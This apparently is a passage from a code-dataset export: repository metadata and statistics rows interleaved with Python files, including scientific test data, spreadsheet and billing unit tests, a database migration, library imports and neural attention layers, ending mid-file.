| 5,274
| 124
| 84
| 42.532258
| 0.873125
| 0
| 0
| 0.775701
| 0
| 0
| 0.031475
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.280374
| false
| 0.009346
| 0.280374
| 0.140187
| 0.981308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 11
|
98df0032cc98e3a41835e2b4355b81f21cd5e78d
| 2,647
|
py
|
Python
|
tests/Unit/PointwiseFunctions/AnalyticData/GrMhd/MagneticRotor.py
|
nilsvu/spectre
|
1455b9a8d7e92db8ad600c66f54795c29c3052ee
|
[
"MIT"
] | 117
|
2017-04-08T22:52:48.000Z
|
2022-03-25T07:23:36.000Z
|
tests/Unit/PointwiseFunctions/AnalyticData/GrMhd/MagneticRotor.py
|
GitHimanshuc/spectre
|
4de4033ba36547113293fe4dbdd77591485a4aee
|
[
"MIT"
] | 3,177
|
2017-04-07T21:10:18.000Z
|
2022-03-31T23:55:59.000Z
|
tests/Unit/PointwiseFunctions/AnalyticData/GrMhd/MagneticRotor.py
|
geoffrey4444/spectre
|
9350d61830b360e2d5b273fdd176dcc841dbefb0
|
[
"MIT"
] | 85
|
2017-04-07T19:36:13.000Z
|
2022-03-01T10:21:00.000Z
|
# Distributed under the MIT License.
# See LICENSE.txt for details.
import numpy as np
def compute_piecewise(x, rotor_radius, inner_value, outer_value):
    """Select between two values based on the cylindrical radius of x.

    Returns inner_value for points at or inside rotor_radius (measured in
    the x-y plane from the first two coordinates), outer_value otherwise.
    """
    cylindrical_radius = np.sqrt(x[0] ** 2 + x[1] ** 2)
    return inner_value if cylindrical_radius <= rotor_radius else outer_value
def rest_mass_density(x, rotor_radius, inner_density, outer_density, pressure,
                      angular_velocity, magnetic_field, adiabatic_index):
    """Piecewise-constant density: inner_density inside the rotor, outer_density outside."""
    density = compute_piecewise(x, rotor_radius, inner_density, outer_density)
    return density
def spatial_velocity(x, rotor_radius, inner_density, outer_density, pressure,
                     angular_velocity, magnetic_field, adiabatic_index):
    """Rigid-rotation velocity field: omega x r inside the rotor, zero outside."""
    local_omega = compute_piecewise(x, rotor_radius, angular_velocity, 0.0)
    # v = omega x r for rotation about the z-axis; z-component vanishes.
    return np.array([-local_omega * x[1], local_omega * x[0], 0.0])
def specific_internal_energy(x, rotor_radius, inner_density, outer_density,
                             pressure, angular_velocity, magnetic_field,
                             adiabatic_index):
    """Ideal-gas specific internal energy: p / ((gamma - 1) * rho)."""
    common_args = (x, rotor_radius, inner_density, outer_density, pressure,
                   angular_velocity, magnetic_field, adiabatic_index)
    local_pressure = compute_pressure(*common_args)
    local_density = rest_mass_density(*common_args)
    return 1.0 / (adiabatic_index - 1.0) * local_pressure / local_density
def compute_pressure(x, rotor_radius, inner_density, outer_density, pressure,
                     angular_velocity, magnetic_field, adiabatic_index):
    """Uniform initial pressure: echo the given pressure value unchanged."""
    return pressure
def lorentz_factor(x, rotor_radius, inner_density, outer_density, pressure,
                   angular_velocity, magnetic_field, adiabatic_index):
    """Lorentz factor W = 1 / sqrt(1 - v.v) of the rotor velocity field."""
    velocity = spatial_velocity(x, rotor_radius, inner_density, outer_density,
                                pressure, angular_velocity, magnetic_field,
                                adiabatic_index)
    speed_squared = np.dot(velocity, velocity)
    return 1. / np.sqrt(1. - speed_squared)
def specific_enthalpy(x, rotor_radius, inner_density, outer_density, pressure,
                      angular_velocity, magnetic_field, adiabatic_index):
    """Specific enthalpy h = 1 + gamma * epsilon for the ideal-fluid data."""
    epsilon = specific_internal_energy(x, rotor_radius, inner_density,
                                       outer_density, pressure,
                                       angular_velocity, magnetic_field,
                                       adiabatic_index)
    return 1.0 + adiabatic_index * epsilon
def magnetic_field(x, rotor_radius, inner_density, outer_density, pressure,
                   angular_velocity, magnetic_field, adiabatic_index):
    """Uniform magnetic field: return the given components as an ndarray.

    NOTE: the parameter deliberately shadows this function's name to keep
    the signature identical to the other functions in this module.
    """
    return np.array(magnetic_field)
def divergence_cleaning_field(x, rotor_radius, inner_density, outer_density,
                              pressure, angular_velocity, magnetic_field,
                              adiabatic_index):
    """The divergence-cleaning scalar field vanishes in the initial data."""
    return 0.0
| 40.723077
| 79
| 0.687193
| 314
| 2,647
| 5.455414
| 0.165605
| 0.102744
| 0.105079
| 0.138938
| 0.799766
| 0.783421
| 0.754816
| 0.7338
| 0.7338
| 0.7338
| 0
| 0.008893
| 0.235361
| 2,647
| 64
| 80
| 41.359375
| 0.837451
| 0.023801
| 0
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.209302
| false
| 0
| 0.023256
| 0.139535
| 0.465116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
98e40e76354a084762617cf9de1c0a8ba973f332
| 8,854
|
py
|
Python
|
xlsxwriter/test/worksheet/test_write_sheet_protection.py
|
totdiao/XlsxWriter
|
3d65858d8933bddb8262d500bcc2005f28fde645
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/worksheet/test_write_sheet_protection.py
|
totdiao/XlsxWriter
|
3d65858d8933bddb8262d500bcc2005f28fde645
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/worksheet/test_write_sheet_protection.py
|
totdiao/XlsxWriter
|
3d65858d8933bddb8262d500bcc2005f28fde645
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2016, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestWriteSheetProtection(unittest.TestCase):
    """
    Test the Worksheet _write_sheet_protection() method.

    Every case follows the same pattern: protect the sheet with a password
    and an options dict, write the element, and compare the generated XML.
    """

    def setUp(self):
        self.fh = StringIO()
        self.worksheet = Worksheet()
        self.worksheet._set_filehandle(self.fh)

    def _assert_protection_xml(self, password, options, expected_xml):
        # Shared driver: protect the sheet, write the element, compare output.
        self.worksheet.protect(password, options)
        self.worksheet._write_sheet_protection()
        self.assertEqual(self.fh.getvalue(), expected_xml)

    def test_write_sheet_protection_1(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {},
            """<sheetProtection sheet="1" objects="1" scenarios="1"/>""")

    def test_write_sheet_protection_2(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            'password', {},
            """<sheetProtection password="83AF" sheet="1" objects="1" scenarios="1"/>""")

    def test_write_sheet_protection_3(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'select_locked_cells': 0},
            """<sheetProtection sheet="1" objects="1" scenarios="1" selectLockedCells="1"/>""")

    def test_write_sheet_protection_4(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'format_cells': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" formatCells="0"/>""")

    def test_write_sheet_protection_5(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'format_columns': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" formatColumns="0"/>""")

    def test_write_sheet_protection_6(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'format_rows': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" formatRows="0"/>""")

    def test_write_sheet_protection_7(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'insert_columns': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" insertColumns="0"/>""")

    def test_write_sheet_protection_8(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'insert_rows': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" insertRows="0"/>""")

    def test_write_sheet_protection_9(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'insert_hyperlinks': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" insertHyperlinks="0"/>""")

    def test_write_sheet_protection_10(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'delete_columns': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" deleteColumns="0"/>""")

    def test_write_sheet_protection_11(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'delete_rows': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" deleteRows="0"/>""")

    def test_write_sheet_protection_12(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'sort': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" sort="0"/>""")

    def test_write_sheet_protection_13(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'autofilter': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" autoFilter="0"/>""")

    def test_write_sheet_protection_14(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'pivot_tables': 1},
            """<sheetProtection sheet="1" objects="1" scenarios="1" pivotTables="0"/>""")

    def test_write_sheet_protection_15(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'objects': 1},
            """<sheetProtection sheet="1" scenarios="1"/>""")

    def test_write_sheet_protection_16(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '', {'scenarios': 1},
            """<sheetProtection sheet="1" objects="1"/>""")

    def test_write_sheet_protection_17(self):
        """Test the _write_sheet_protection() method."""
        self._assert_protection_xml(
            '',
            {'format_cells': 1, 'select_locked_cells': 0,
             'select_unlocked_cells': 0},
            """<sheetProtection sheet="1" objects="1" scenarios="1" formatCells="0" selectLockedCells="1" selectUnlockedCells="1"/>""")

    def test_write_sheet_protection_18(self):
        """Test the _write_sheet_protection() method."""
        options = {
            'objects': 1,
            'scenarios': 1,
            'format_cells': 1,
            'format_columns': 1,
            'format_rows': 1,
            'insert_columns': 1,
            'insert_rows': 1,
            'insert_hyperlinks': 1,
            'delete_columns': 1,
            'delete_rows': 1,
            'select_locked_cells': 0,
            'sort': 1,
            'autofilter': 1,
            'pivot_tables': 1,
            'select_unlocked_cells': 0,
        }
        self._assert_protection_xml(
            'drowssap', options,
            """<sheetProtection password="996B" sheet="1" formatCells="0" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" insertHyperlinks="0" deleteColumns="0" deleteRows="0" selectLockedCells="1" sort="0" autoFilter="0" pivotTables="0" selectUnlockedCells="1"/>""")
| 30.426117
| 286
| 0.611136
| 933
| 8,854
| 5.570204
| 0.096463
| 0.10583
| 0.211661
| 0.107754
| 0.833173
| 0.820858
| 0.820858
| 0.820858
| 0.803541
| 0.736386
| 0
| 0.022321
| 0.241021
| 8,854
| 290
| 287
| 30.531034
| 0.751042
| 0.102665
| 0
| 0.535714
| 0
| 0.011905
| 0.238943
| 0.023082
| 0
| 0
| 0
| 0
| 0.107143
| 1
| 0.113095
| false
| 0.22619
| 0.017857
| 0
| 0.136905
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
98ed29a70654be02e27dd878a2444e94eab8af89
| 44
|
py
|
Python
|
src/sage/crypto/__init__.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | 5
|
2015-01-04T07:15:06.000Z
|
2022-03-04T15:15:18.000Z
|
src/sage/crypto/__init__.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | null | null | null |
src/sage/crypto/__init__.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | 10
|
2016-09-28T13:12:40.000Z
|
2022-02-12T09:28:34.000Z
|
# NOTE(review): these are Python 2 implicit relative imports (removed by
# PEP 328 in Python 3). Under Python 3 they would need to be written as
# "from sage.crypto.lattice import gen_lattice" and "from . import all" —
# confirm the supported interpreter version before changing them.
from lattice import gen_lattice
import all
| 11
| 31
| 0.840909
| 7
| 44
| 5.142857
| 0.714286
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 3
| 32
| 14.666667
| 0.972973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c70eb3191bf991f66333f7f071c60d73363ea369
| 4,782
|
py
|
Python
|
knownly/billing/tests/__init__.py
|
dwightgunning/knownly
|
55a3f82887dca1ff94723e3272ef79ed5f2d0eb2
|
[
"MIT"
] | 2
|
2017-11-21T20:24:01.000Z
|
2018-12-24T04:32:31.000Z
|
knownly/billing/tests/__init__.py
|
dwightgunning/knownly
|
55a3f82887dca1ff94723e3272ef79ed5f2d0eb2
|
[
"MIT"
] | 2
|
2020-06-05T18:05:19.000Z
|
2021-06-10T20:04:02.000Z
|
knownly/billing/tests/__init__.py
|
dwightgunning/knownly
|
55a3f82887dca1ff94723e3272ef79ed5f2d0eb2
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.test import TestCase
from knownly.billing.forms import SubscriptionPlanForm
from knownly.billing.models import CustomerBillingDetails
from knownly import plans
class SubscriptionPlanFormTest(TestCase):
    """Validation tests for SubscriptionPlanForm across the available plans.

    Fix: removed a leftover Python 2 debug statement
    (``print "ERRORS: %s" % form.errors``) which is a syntax error under
    Python 3 and polluted the test output, together with the redundant
    ``form.is_valid()`` call that only existed to populate errors for it.
    The repeated error-pop sequences are factored into a private helper.
    """

    def _assert_exactly_missing(self, form, expected_fields):
        # The form must be invalid, and its errors must cover exactly the
        # expected fields: popping each one must leave the error dict empty.
        self.assertFalse(form.is_valid())
        for field in expected_fields:
            self.assertTrue(form.errors.pop(field))
        self.assertFalse(form.errors)

    def test_basic_plan_fields_required(self):
        """An empty submission must at least require the plan choice."""
        form = SubscriptionPlanForm(data={})
        self._assert_exactly_missing(form, ['knownly_plan'])

    def test_free_plan(self):
        """The free plan needs no billing details."""
        form_data = {'knownly_plan': plans.FREE}
        form = SubscriptionPlanForm(data=form_data)
        self.assertEqual(form.is_valid(), True)

    def test_lite_fields_required(self):
        """The lite plan requires the full set of billing fields."""
        form = SubscriptionPlanForm(data={'knownly_plan': plans.LITE})
        self._assert_exactly_missing(form, [
            'customer_type', 'period', 'currency', 'name', 'street_address',
            'city', 'post_code', 'country', 'cc_bin', 'stripe_token'])

    def test_lite_personal_fields_required(self):
        """With customer_type supplied, all remaining billing fields are required."""
        form = SubscriptionPlanForm(data={
            'knownly_plan': plans.LITE,
            'customer_type': CustomerBillingDetails.PERSONAL})
        self._assert_exactly_missing(form, [
            'period', 'currency', 'name', 'street_address', 'city',
            'post_code', 'country', 'cc_bin', 'stripe_token'])

    def test_lite_business_non_eu_fields_required(self):
        """A business customer without an EU country is not asked for a VAT id."""
        form = SubscriptionPlanForm(data={
            'knownly_plan': plans.LITE,
            'customer_type': CustomerBillingDetails.BUSINESS})
        self._assert_exactly_missing(form, [
            'period', 'currency', 'name', 'street_address', 'city',
            'post_code', 'country', 'cc_bin', 'stripe_token'])

    def test_lite_business_eu_fields_required(self):
        """A business customer in an EU country must additionally supply a VAT id."""
        form = SubscriptionPlanForm(data={
            'knownly_plan': plans.LITE,
            'customer_type': CustomerBillingDetails.BUSINESS,
            'country': 'NL'})
        self._assert_exactly_missing(form, [
            'period', 'currency', 'name', 'street_address', 'city',
            'post_code', 'cc_bin', 'stripe_token', 'vat_id'])

    def test_lite_monthly_usd_personal(self):
        """A fully populated personal/monthly/USD submission validates."""
        form = SubscriptionPlanForm(data={
            'knownly_plan': plans.LITE,
            'customer_type': CustomerBillingDetails.PERSONAL,
            'period': 'monthly',
            'currency': 'usd',
            'stripe_token': 'abc',
            'name': 'Dwight Gunning',
            'street_address': 'van Tuyll van Serooskerkenweg 73i',
            'city': 'Amsterdam',
            'post_code': '1076JG',
            'country': 'NL',
            'cc_bin': '123456',
        })
        self.assertTrue(form.is_valid(), form.errors)
| 44.691589
| 96
| 0.595985
| 488
| 4,782
| 5.690574
| 0.14959
| 0.162045
| 0.252791
| 0.328412
| 0.770256
| 0.761973
| 0.733885
| 0.720922
| 0.720922
| 0.720922
| 0
| 0.003483
| 0.27959
| 4,782
| 106
| 97
| 45.113208
| 0.802612
| 0
| 0
| 0.556818
| 0
| 0
| 0.125471
| 0
| 0
| 0
| 0
| 0
| 0.568182
| 0
| null | null | 0
| 0.056818
| null | null | 0.011364
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c730433451854550af12eb17824a1a9c3e04ff6a
| 1,952
|
py
|
Python
|
netbox/extras/migrations/0054_standardize_models.py
|
orphanedgamboa/netbox
|
5cdc38ec3adb5278480b267a6c8e674e9d3fca39
|
[
"Apache-2.0"
] | 1
|
2022-02-18T03:00:08.000Z
|
2022-02-18T03:00:08.000Z
|
netbox/extras/migrations/0054_standardize_models.py
|
emersonfelipesp/netbox
|
fecca5ad83fb6b48a2f15982dfd3242653f105f9
|
[
"Apache-2.0"
] | 1
|
2021-08-23T15:38:47.000Z
|
2021-08-23T15:40:10.000Z
|
netbox/extras/migrations/0054_standardize_models.py
|
emersonfelipesp/netbox
|
fecca5ad83fb6b48a2f15982dfd3242653f105f9
|
[
"Apache-2.0"
] | 1
|
2018-12-05T12:03:21.000Z
|
2018-12-05T12:03:21.000Z
|
from django.db import migrations, models
class Migration(migrations.Migration):
    """Convert the primary key of every extras model to BigAutoField."""

    dependencies = [
        ('extras', '0053_rename_webhook_obj_type'),
    ]

    # The identical id-field change applies uniformly to every model in the
    # app, so the AlterField operations are generated from the model list
    # (in the original order).
    operations = [
        migrations.AlterField(
            model_name=altered_model,
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        )
        for altered_model in (
            'configcontext',
            'customfield',
            'customlink',
            'exporttemplate',
            'imageattachment',
            'jobresult',
            'objectchange',
            'tag',
            'taggeditem',
            'webhook',
        )
    ]
| 31.483871
| 73
| 0.567111
| 168
| 1,952
| 6.446429
| 0.214286
| 0.184672
| 0.23084
| 0.267775
| 0.767313
| 0.767313
| 0.767313
| 0.767313
| 0.767313
| 0.767313
| 0
| 0.003014
| 0.320184
| 1,952
| 61
| 74
| 32
| 0.813112
| 0
| 0
| 0.701754
| 0
| 0
| 0.080943
| 0.014344
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c75e0341918bb67d29fcb0b3e9155fd61be81aca
| 307
|
py
|
Python
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/pandas/core/reshape/api.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 18
|
2018-02-23T11:28:54.000Z
|
2021-09-23T08:19:54.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/pandas/core/reshape/api.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 2
|
2018-01-22T23:21:36.000Z
|
2018-01-22T23:31:27.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/pandas/core/reshape/api.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 12
|
2017-05-23T06:01:12.000Z
|
2021-08-16T05:09:46.000Z
|
# flake8: noqa
from pandas.core.reshape.concat import concat
from pandas.core.reshape.reshape import melt
from pandas.core.reshape.merge import (
merge, ordered_merge, merge_ordered, merge_asof)
from pandas.core.reshape.pivot import pivot_table, crosstab
from pandas.core.reshape.tile import cut, qcut
| 34.111111
| 59
| 0.811075
| 46
| 307
| 5.326087
| 0.391304
| 0.204082
| 0.285714
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003663
| 0.110749
| 307
| 8
| 60
| 38.375
| 0.893773
| 0.039088
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.833333
| 0
| 0.833333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c75f6f3282b689f54f4b41b511f4da94d9fb2c3b
| 17,014
|
py
|
Python
|
deeppavlov/core/layers/tf_attention_mechanisms.py
|
xbodx/DeepPavlov
|
4b60bf162df4294b8b0db3b72786cdd699c674fa
|
[
"Apache-2.0"
] | 5,893
|
2018-02-01T18:13:20.000Z
|
2022-03-31T19:22:21.000Z
|
deeppavlov/core/layers/tf_attention_mechanisms.py
|
xbodx/DeepPavlov
|
4b60bf162df4294b8b0db3b72786cdd699c674fa
|
[
"Apache-2.0"
] | 749
|
2018-01-31T11:36:02.000Z
|
2022-03-30T07:24:22.000Z
|
deeppavlov/core/layers/tf_attention_mechanisms.py
|
xbodx/DeepPavlov
|
4b60bf162df4294b8b0db3b72786cdd699c674fa
|
[
"Apache-2.0"
] | 1,155
|
2018-02-01T10:52:15.000Z
|
2022-03-29T02:12:15.000Z
|
# Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from logging import getLogger
import tensorflow as tf
from tensorflow.contrib.layers import xavier_initializer as xav
from deeppavlov.core.layers import tf_csoftmax_attention as csoftmax_attention
log = getLogger(__name__)
def general_attention(key, context, hidden_size, projected_align=False):
    """Luong et al. attention mechanism with a "general" score function.

    Based on the paper https://arxiv.org/abs/1508.04025, "Effective
    Approaches to Attention-based Neural Machine Translation".

    Args:
        key: A tensorflow tensor with dimensionality [None, None, key_size]
        context: A tensorflow tensor with dimensionality
            [None, None, max_num_tokens, token_size]
        hidden_size: Number of units in the hidden representation
        projected_align: Using bidirectional lstm for hidden representation
            of context. If True, a bidirectional lstm layer of dimensionality
            [hidden_size] is inserted between the input and the attention
            mechanism and its output is attended. If False, the raw context
            is used for the output.

    Returns:
        output: Tensor at the output with dimensionality
            [None, None, hidden_size] when projected_align is True, otherwise
            [None, None, token_size]

    Raises:
        ValueError: If hidden_size is odd (it is split evenly across the two
            LSTM directions).
    """
    if hidden_size % 2 != 0:
        raise ValueError("hidden size must be dividable by two")
    batch_size = tf.shape(context)[0]
    max_num_tokens, token_size = context.get_shape().as_list()[-2:]
    # Collapse the leading batch/time dimensions: one row per token sequence.
    r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
    # projected_key: [None, None, hidden_size]
    projected_key = \
        tf.layers.dense(key, hidden_size, kernel_initializer=xav())
    r_projected_key = tf.reshape(projected_key, shape=[-1, hidden_size, 1])
    # Each direction gets half of hidden_size so the concatenation below has
    # exactly hidden_size units.
    lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    (output_fw, output_bw), states = \
        tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_fw_cell,
                                        cell_bw=lstm_bw_cell,
                                        inputs=r_context,
                                        dtype=tf.float32)
    # bilstm_output: [-1, max_num_tokens, hidden_size]
    bilstm_output = tf.concat([output_fw, output_bw], -1)
    # "General" score: softmax over the token axis of
    # BiLSTM(context) . (W * key).
    attn = tf.nn.softmax(tf.matmul(bilstm_output, r_projected_key), dim=1)
    if projected_align:
        log.info("Using projected attention alignment")
        t_context = tf.transpose(bilstm_output, [0, 2, 1])
        output = tf.reshape(tf.matmul(t_context, attn),
                            shape=[batch_size, -1, hidden_size])
    else:
        log.info("Using without projected attention alignment")
        t_context = tf.transpose(r_context, [0, 2, 1])
        output = tf.reshape(tf.matmul(t_context, attn),
                            shape=[batch_size, -1, token_size])
    return output
def light_general_attention(key, context, hidden_size, projected_align=False):
    """ Luong et al. attention mechanism with general score (lightweight variant).
    Based on the paper:
    https://arxiv.org/abs/1508.04025 "Effective Approaches to Attention-based Neural Machine Translation"

    Args:
        key: A tensorflow tensor with dimensionality [None, None, key_size]
        context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
        hidden_size: Number of units in hidden representation
        projected_align: Whether to use a dense layer for the hidden representation
            of context. If true, a dense layer with dimensionality [hidden_size] is
            inserted between the input and the attention mechanism; if false, the
            raw context is used for the weighted sum.

    Returns:
        output: Tensor at the output with dimensionality [None, None, hidden_size]
    """
    batch_size = tf.shape(context)[0]
    max_num_tokens, token_size = context.get_shape().as_list()[-2:]
    # Collapse batch and time dimensions: [-1, max_num_tokens, token_size]
    context_3d = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
    # Key projected into the attention space: [None, None, hidden_size]
    key_proj = tf.layers.dense(key, hidden_size, kernel_initializer=xav())
    # Reshaped to a column vector per (batch, time) step: [-1, hidden_size, 1]
    key_col = tf.reshape(key_proj, shape=[-1, hidden_size, 1])
    # Context projected into the attention space: [-1, max_num_tokens, hidden_size]
    context_proj = tf.layers.dense(context_3d, hidden_size,
                                   kernel_initializer=xav())
    # General score = projected_context @ projected_key, softmax over tokens.
    attn_weights = tf.nn.softmax(tf.matmul(context_proj, key_col), dim=1)
    if projected_align:
        log.info("Using projected attention alignment")
        weighted = tf.matmul(tf.transpose(context_proj, [0, 2, 1]), attn_weights)
        output = tf.reshape(weighted, shape=[batch_size, -1, hidden_size])
    else:
        log.info("Using without projected attention alignment")
        weighted = tf.matmul(tf.transpose(context_3d, [0, 2, 1]), attn_weights)
        output = tf.reshape(weighted, shape=[batch_size, -1, token_size])
    return output
def cs_general_attention(key, context, hidden_size, depth, projected_align=False):
    """ An implementation of the Luong et al. attention mechanism with general score
    and the constrained softmax (csoftmax). Based on the papers:
    https://arxiv.org/abs/1508.04025 "Effective Approaches to Attention-based Neural Machine Translation"
    https://andre-martins.github.io/docs/emnlp2017_final.pdf "Learning What's Easy: Fully Differentiable Neural Easy-First Taggers"

    Args:
        key: A tensorflow tensor with dimensionality [None, None, key_size]
        context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
        hidden_size: Number of units in hidden representation
        depth: Number of csoftmax usages
        projected_align: Whether to use a bidirectional lstm for the hidden
            representation of context. If true, a bidirectional lstm layer with
            dimensionality [hidden_size] is inserted between the input and the
            attention mechanism; if false, the projected context is aligned directly.

    Returns:
        output: Tensor at the output with dimensionality [None, None, depth * hidden_size]
            (or [None, None, depth * token_size] when projected_align is false)
    """
    if hidden_size % 2 != 0:
        raise ValueError("hidden size must be dividable by two")
    batch_size = tf.shape(context)[0]
    max_num_tokens, token_size = context.get_shape().as_list()[-2:]
    r_context = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
    # projected_context: [None, max_num_tokens, token_size]
    projected_context = tf.layers.dense(r_context, token_size,
                                        kernel_initializer=xav(),
                                        name='projected_context')
    lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    # Final states are not needed; only the per-token outputs are used.
    (output_fw, output_bw), _ = \
        tf.nn.bidirectional_dynamic_rnn(cell_fw=lstm_fw_cell,
                                        cell_bw=lstm_bw_cell,
                                        inputs=projected_context,
                                        dtype=tf.float32)
    # bilstm_output: [-1, max_num_tokens, hidden_size]
    bilstm_output = tf.concat([output_fw, output_bw], -1)
    h_state_for_sketch = bilstm_output
    if projected_align:
        log.info("Using projected attention alignment")
        h_state_for_attn_alignment = bilstm_output
        aligned_h_state = csoftmax_attention.attention_gen_block(
            h_state_for_sketch, h_state_for_attn_alignment, key, depth)
        output = \
